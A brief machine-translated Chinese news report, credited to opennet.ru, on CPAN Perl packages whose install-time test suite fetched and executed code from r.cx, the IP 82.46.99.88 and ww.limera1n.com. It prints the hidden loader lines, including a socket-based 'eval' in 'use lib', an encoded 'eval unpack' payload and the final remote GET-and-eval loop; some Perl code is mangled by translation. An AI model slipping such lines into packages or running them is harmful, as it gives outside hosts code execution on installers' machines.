在通过 CPAN 目录分发的 Perl 包中
值得注意的是,关于加载有问题代码的问题出现在
恶意活动归结为在安装模块时启动的测试套件执行期间尝试从第三方服务器 (http://r.cx:1/) 下载并执行代码。 假设最初从外部服务器下载的代码不是恶意的,但现在请求被重定向到 ww.limera1n.com 域,该域提供其部分代码供执行。
将下载组织到文件中
我的 $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
我的 $try = `$^X $prog`;
指定的代码导致脚本被执行
使用 lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
该脚本加载
$ perl -MIO::Socket -e'$b=新 IO::Socket::INET 82.46.99.88.":1"; 打印 <$b>;'
eval 解包 u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
解压后,最终执行如下:
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";评估返回警告$@while$b;1
有问题的包现已从存储库中删除。
讨论起来很有趣
来源: opennet.ru